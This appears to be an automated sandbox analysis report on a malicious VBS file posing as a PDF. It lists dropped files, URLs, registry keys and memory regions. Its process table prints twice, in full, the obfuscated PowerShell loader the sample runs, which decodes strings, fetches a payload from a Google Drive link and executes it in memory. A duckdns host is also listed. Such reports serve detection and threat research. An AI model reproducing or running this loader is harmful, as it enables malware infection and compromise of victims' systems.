Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
AF85714759_htm#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_442wxg2x.rgl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqmq5coj.o0u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nixuewvc.mtj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ortgq2c4.ccg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Folkeslaget.Opi
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\AF85714759_htm#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150
Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne
Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares
Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds
outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture)
{$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For(
$Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker,
$Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge
'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi
RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge
'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo
TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng
nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge
',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts.
';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls
Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh
,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec
.eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe
bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge
'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni
Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[
P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge '
,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDal SeMa(Ur$,tAPercacLehS.aAniRas ,eSarAu,S $A.N,noAgnPedTreTrc So .rSuaSktMliFao
Vn.o2Am3 R5Gu)Ke ';$Nondecoration235=$Stationcaren[0];Dkvingen (Sprge 'T.$Odg .lJio FbdoaI.l .:chNPro .n Sm.eaPurolk,ieDitPr=Dr(PoT
Fe es.ltC -ChPRiaDetDehUs D.$ HNStoExnScdNieRoc.po .r aG,t Sinuo onko2Du3Au5 B)Ss ');while (!$Nonmarket) {Dkvingen (Sprge
'Be$Ingrel okobSeaUnlFl: .BBliSel,gvDdr ,aH gSaeO tLa=.o$Unt .rBouUne U ') ;Dkvingen $Kundetilfredshedsgarantiernes;Dkvingen
(Sprge 'DiSR,tNaaArr .t.d- ESRolRaePee,opDe ,4Bu ');Dkvingen (Sprge 'Sl$SugO.l Somub.saVel.n: FNUdo enDem GaTirPlkC.eJut
a=M.(.oTn,e SsF.t R-C,PCoaArtruhDe .$HlNCho Jn,ldCoeOvcPuoRerDda ,tCoiC.ofinPj2T.3Ra5 P)e ') ;Dkvingen (Sprge 'Mu$Kag Fl
,o .bUsaL lC : ,Pchr Iep.p Ki .oFou usfa=Mu$sagErl.ao b MaExlB :DeESlsKym Ce .rFoa.nlAmd saLo+Af+R.%,l$.oE un.ugg lFoe sjukAfa
jrBeeRes I. ,cenoCyuTan et.v ') ;$Archaiser=$Engleskares[$Prepious];}$Facially=314646;$Tilvrelsesforms=26399;Dkvingen (Sprge
' ,$ gBulM o Bb aValVa: LSFej,olKleQusPaoCor,kg e DrGe ,o=.a kaGS.eG,t r-BaC Lo,onEkt.ne,qnSltSi D $R,N AoSunstdC.e PcF.oDirCyaq,t
iiBroEnnHe2Mu3Ma5Ud ');Dkvingen (Sprge ' ,$ Cg ,lFro .bBaa l :,aU pR,pAfi FlH eScd.y Pa=Ad By[A.SMayArs PtTieAmm y.BiCSlo
enK,vApeOrrF tUd]le:L.:,lF ar ro,em,oBA,aBas Te R6 i4R S RtF rC,i AnHng (Ce$MeSsej DlCreBas ,oTor,aga.e DrOv)E ');Dkvingen
(Sprge 'Ho$ScgO l koGrbsiaPalTr: ,MViaGuiI,nSaf PrBaaNdmOveE,so. Ke=Da ,n[BeSPlyNes Ft.neRhmEn.HoTS e cxFltAu. REH nSec .o
VdFjiGrnM gCo]Om:P.:,eANeS,tCAfI rIFi. SGRee,atSuSQ tRerLoiChnSmgwa( O$StUC pA pPii MlUne.idB,) ');Dkvingen (Sprge ' K$
gAllFloS.bAnaStlR.:StKInyUdn ld Ai gKo=Ap$DaM,oaGri.nnStfMirU aSpmSke EsR..NisgyuH bTis GtKnr,ii un.ig d(Ba$c,F Castc.ui
SaStlTrlDey.o, y$,iTHii Sl,lvRorBoe TlIdsNgeI.sKofT.oOvrBamK.s .)Su ');Dkvingen $Kyndig;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150
Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne
Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares
Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds
outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture)
{$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For(
$Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker,
$Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge
'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi
RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge
'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo
TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng
nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge
',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts.
';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls
Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh
,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec
.eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe
bcCou trMyi HtOmy.iPUdrSkoP.t oVac o elArTKlyOpp HePr],i:Ud:CoTN,lF sNo1 V2 K ');$Archaiser=$Engleskares[0];$Merocele= (Sprge
'F $AngBelSpoExb.naOmlNe:UrB ,fRul FeStnRe=UkN,le owBa-PrOMab.ljUte,rcVetfr F.SA.y nsR tPreInm,e.GrNBoeIntB..ElWFreMybPeCEplUni
Be Jn Tt');$Merocele+=$Stationcaren[1];Dkvingen ($Merocele);Dkvingen (Sprge ',o$NuBU.f olSueRen ,.K H,me Ra,odapeNorFos .[
P$StT PhDee Solir.riTuzC e,o]Es=Fi$ OKom ,su.oStrm.gVrsBrf UuR,lSmd.heHarSpe h ');$Kundetilfredshedsgarantiernes=Sprge '
,$ ABVefDalBieGanem.KiDT,o Fw.nnSul noNua Sd .F KiDal SeMa(Ur$,tAPercacLehS.aAniRas ,eSarAu,S $A.N,noAgnPedTreTrc So .rSuaSktMliFao
Vn.o2Am3 R5Gu)Ke ';$Nondecoration235=$Stationcaren[0];Dkvingen (Sprge 'T.$Odg .lJio FbdoaI.l .:chNPro .n Sm.eaPurolk,ieDitPr=Dr(PoT
Fe es.ltC -ChPRiaDetDehUs D.$ HNStoExnScdNieRoc.po .r aG,t Sinuo onko2Du3Au5 B)Ss ');while (!$Nonmarket) {Dkvingen (Sprge
'Be$Ingrel okobSeaUnlFl: .BBliSel,gvDdr ,aH gSaeO tLa=.o$Unt .rBouUne U ') ;Dkvingen $Kundetilfredshedsgarantiernes;Dkvingen
(Sprge 'DiSR,tNaaArr .t.d- ESRolRaePee,opDe ,4Bu ');Dkvingen (Sprge 'Sl$SugO.l Somub.saVel.n: FNUdo enDem GaTirPlkC.eJut
a=M.(.oTn,e SsF.t R-C,PCoaArtruhDe .$HlNCho Jn,ldCoeOvcPuoRerDda ,tCoiC.ofinPj2T.3Ra5 P)e ') ;Dkvingen (Sprge 'Mu$Kag Fl
,o .bUsaL lC : ,Pchr Iep.p Ki .oFou usfa=Mu$sagErl.ao b MaExlB :DeESlsKym Ce .rFoa.nlAmd saLo+Af+R.%,l$.oE un.ugg lFoe sjukAfa
jrBeeRes I. ,cenoCyuTan et.v ') ;$Archaiser=$Engleskares[$Prepious];}$Facially=314646;$Tilvrelsesforms=26399;Dkvingen (Sprge
' ,$ gBulM o Bb aValVa: LSFej,olKleQusPaoCor,kg e DrGe ,o=.a kaGS.eG,t r-BaC Lo,onEkt.ne,qnSltSi D $R,N AoSunstdC.e PcF.oDirCyaq,t
iiBroEnnHe2Mu3Ma5Ud ');Dkvingen (Sprge ' ,$ Cg ,lFro .bBaa l :,aU pR,pAfi FlH eScd.y Pa=Ad By[A.SMayArs PtTieAmm y.BiCSlo
enK,vApeOrrF tUd]le:L.:,lF ar ro,em,oBA,aBas Te R6 i4R S RtF rC,i AnHng (Ce$MeSsej DlCreBas ,oTor,aga.e DrOv)E ');Dkvingen
(Sprge 'Ho$ScgO l koGrbsiaPalTr: ,MViaGuiI,nSaf PrBaaNdmOveE,so. Ke=Da ,n[BeSPlyNes Ft.neRhmEn.HoTS e cxFltAu. REH nSec .o
VdFjiGrnM gCo]Om:P.:,eANeS,tCAfI rIFi. SGRee,atSuSQ tRerLoiChnSmgwa( O$StUC pA pPii MlUne.idB,) ');Dkvingen (Sprge ' K$
gAllFloS.bAnaStlR.:StKInyUdn ld Ai gKo=Ap$DaM,oaGri.nnStfMirU aSpmSke EsR..NisgyuH bTis GtKnr,ii un.ig d(Ba$c,F Castc.ui
SaStlTrlDey.o, y$,iTHii Sl,lvRorBoe TlIdsNgeI.sKofT.oOvrBamK.s .)Su ');Dkvingen $Kyndig;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Folkeslaget.Opi && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Folkeslaget.Opi && echo t"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a458386d9.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.goog
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/uc?ex
|
unknown
|
||
|
http://microsoft.co
|
unknown
|
||
|
https://drive.google.com/u
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
http://crl.micros5
|
unknown
|
||
|
https://drive.google.
|
unknown
|
||
|
https://drive.go
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.microsoft.coA
|
unknown
|
||
|
https://drive.goo
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://drive.g
|
unknown
|
||
|
https://drive.google.com/uc
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://drive.googl
|
unknown
|
||
|
https://drive.google.com/uc?e
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.google.c
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.google.com/uc?
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://drive.google
|
unknown
|
||
|
https://drive.google.co
|
unknown
|
There are 31 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.186.110
|
||
|
drive.usercontent.google.com
|
142.250.184.225
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.184.225
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.186.110
|
drive.google.com
|
United States
|
||
|
142.250.186.33
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 9 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
197D36A8000
|
trusted library allocation
|
page read and write
|
|
|
|
9FA8000
|
heap
|
page read and write
|
|
|
|
615A000
|
trusted library allocation
|
page read and write
|
|
|
|
8DB0000
|
direct allocation
|
page execute and read and write
|
|
|
|
CB1E000
|
direct allocation
|
page execute and read and write
|
|
|
|
4CE0000
|
trusted library allocation
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
8DD0000
|
direct allocation
|
page read and write
|
||
|
1D124CA2000
|
heap
|
page read and write
|
||
|
1D124C74000
|
heap
|
page read and write
|
||
|
1D124CA2000
|
heap
|
page read and write
|
||
|
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
|
356E000
|
stack
|
page read and write
|
||
|
A05B000
|
heap
|
page read and write
|
||
|
7FFD3444B000
|
trusted library allocation
|
page read and write
|
||
|
197C5415000
|
trusted library allocation
|
page read and write
|
||
|
197C1A9A000
|
heap
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
197C3D21000
|
trusted library allocation
|
page read and write
|
||
|
1F72FC10000
|
heap
|
page read and write
|
||
|
7570000
|
direct allocation
|
page read and write
|
||
|
1F810EA0000
|
heap
|
page read and write
|
||
|
2E4F000
|
stack
|
page read and write
|
||
|
197DB9CE000
|
heap
|
page read and write
|
||
|
1F810F64000
|
heap
|
page read and write
|
||
|
B7D06FF000
|
stack
|
page read and write
|
||
|
2581B000
|
stack
|
page read and write
|
||
|
197DBCB0000
|
heap
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
1D124CA2000
|
heap
|
page read and write
|
||
|
36A0000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
584F000
|
stack
|
page read and write
|
||
|
197D364F000
|
trusted library allocation
|
page read and write
|
||
|
1D124C80000
|
heap
|
page read and write
|
||
|
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
|
8860000
|
heap
|
page read and write
|
||
|
1D124CA5000
|
heap
|
page read and write
|
||
|
1D125127000
|
heap
|
page read and write
|
||
|
7690000
|
heap
|
page read and write
|
||
|
7590000
|
direct allocation
|
page read and write
|
||
|
5BC70FE000
|
stack
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
9E10000
|
heap
|
page read and write
|
||
|
254BE000
|
stack
|
page read and write
|
||
|
360E000
|
stack
|
page read and write
|
||
|
197C5437000
|
trusted library allocation
|
page read and write
|
||
|
7A8B000
|
heap
|
page read and write
|
||
|
7FFD34620000
|
trusted library allocation
|
page execute and read and write
|
||
|
197C48C5000
|
trusted library allocation
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
89CC000
|
heap
|
page read and write
|
||
|
5BC717E000
|
stack
|
page read and write
|
||
|
197C55DA000
|
trusted library allocation
|
page read and write
|
||
|
9FA0000
|
heap
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
1F810DC0000
|
heap
|
page read and write
|
||
|
1F72FBF0000
|
heap
|
page read and write
|
||
|
256AD000
|
stack
|
page read and write
|
||
|
789E000
|
stack
|
page read and write
|
||
|
515B000
|
stack
|
page read and write
|
||
|
1D124CCD000
|
heap
|
page read and write
|
||
|
7580000
|
direct allocation
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
|
7CAD000
|
stack
|
page read and write
|
||
|
197DBA57000
|
heap
|
page read and write
|
||
|
7FFD34434000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
|
F31E000
|
direct allocation
|
page execute and read and write
|
||
|
4D8E000
|
stack
|
page read and write
|
||
|
4CB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7671000
|
remote allocation
|
page execute and read and write
|
||
|
256EE000
|
stack
|
page read and write
|
||
|
7FFD344EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CC9000
|
trusted library allocation
|
page read and write
|
||
|
254FE000
|
stack
|
page read and write
|
||
|
1D124D5D000
|
heap
|
page read and write
|
||
|
4E0C000
|
stack
|
page read and write
|
||
|
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
|
567E000
|
remote allocation
|
page execute and read and write
|
||
|
5116000
|
trusted library allocation
|
page read and write
|
||
|
A31E000
|
direct allocation
|
page execute and read and write
|
||
|
8982000
|
heap
|
page read and write
|
||
|
1D124C67000
|
heap
|
page read and write
|
||
|
5BC763C000
|
stack
|
page read and write
|
||
|
58CC000
|
stack
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
4C7E000
|
remote allocation
|
page execute and read and write
|
||
|
197DBCB4000
|
heap
|
page read and write
|
||
|
1D124B54000
|
heap
|
page read and write
|
||
|
7DEB000
|
stack
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
7BA8000
|
trusted library allocation
|
page read and write
|
||
|
25750000
|
remote allocation
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
2D0E000
|
unkown
|
page read and write
|
||
|
4E40000
|
heap
|
page read and write
|
||
|
9E70000
|
heap
|
page read and write
|
||
|
87A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
|
1D122E4D000
|
heap
|
page read and write
|
||
|
756B000
|
stack
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
|
1D124C67000
|
heap
|
page read and write
|
||
|
580E000
|
stack
|
page read and write
|
||
|
1D124B3C000
|
heap
|
page read and write
|
||
|
197C4EF0000
|
trusted library allocation
|
page read and write
|
||
|
5BC808E000
|
stack
|
page read and write
|
||
|
7CF0000
|
trusted library allocation
|
page read and write
|
||
|
52C0000
|
heap
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
A00A000
|
heap
|
page read and write
|
||
|
257CF000
|
stack
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
1F810EC0000
|
heap
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
197C542C000
|
trusted library allocation
|
page read and write
|
||
|
7670000
|
heap
|
page read and write
|
||
|
733E000
|
stack
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
7D70000
|
trusted library allocation
|
page read and write
|
||
|
A01E000
|
heap
|
page read and write
|
||
|
74A0000
|
direct allocation
|
page read and write
|
||
|
8D5C000
|
stack
|
page read and write
|
||
|
5BC75BE000
|
stack
|
page read and write
|
||
|
1D124CFB000
|
heap
|
page read and write
|
||
|
C11E000
|
direct allocation
|
page execute and read and write
|
||
|
197D3641000
|
trusted library allocation
|
page read and write
|
||
|
197C3B03000
|
trusted library allocation
|
page read and write
|
||
|
AF192C000
|
stack
|
page read and write
|
||
|
1D124D31000
|
heap
|
page read and write
|
||
|
25750000
|
remote allocation
|
page read and write
|
||
|
607E000
|
remote allocation
|
page execute and read and write
|
||
|
AF1C7F000
|
stack
|
page read and write
|
||
|
519A000
|
stack
|
page read and write
|
||
|
8988000
|
heap
|
page read and write
|
||
|
1D124B43000
|
heap
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
5BC73B7000
|
stack
|
page read and write
|
||
|
A170000
|
direct allocation
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
B71E000
|
direct allocation
|
page execute and read and write
|
||
|
1D122D2E000
|
heap
|
page read and write
|
||
|
5BC6FFD000
|
stack
|
page read and write
|
||
|
8D60000
|
trusted library allocation
|
page read and write
|
||
|
325B000
|
stack
|
page read and write
|
||
|
4C90000
|
trusted library section
|
page read and write
|
||
|
1D124B31000
|
heap
|
page read and write
|
||
|
197C5558000
|
trusted library allocation
|
page read and write
|
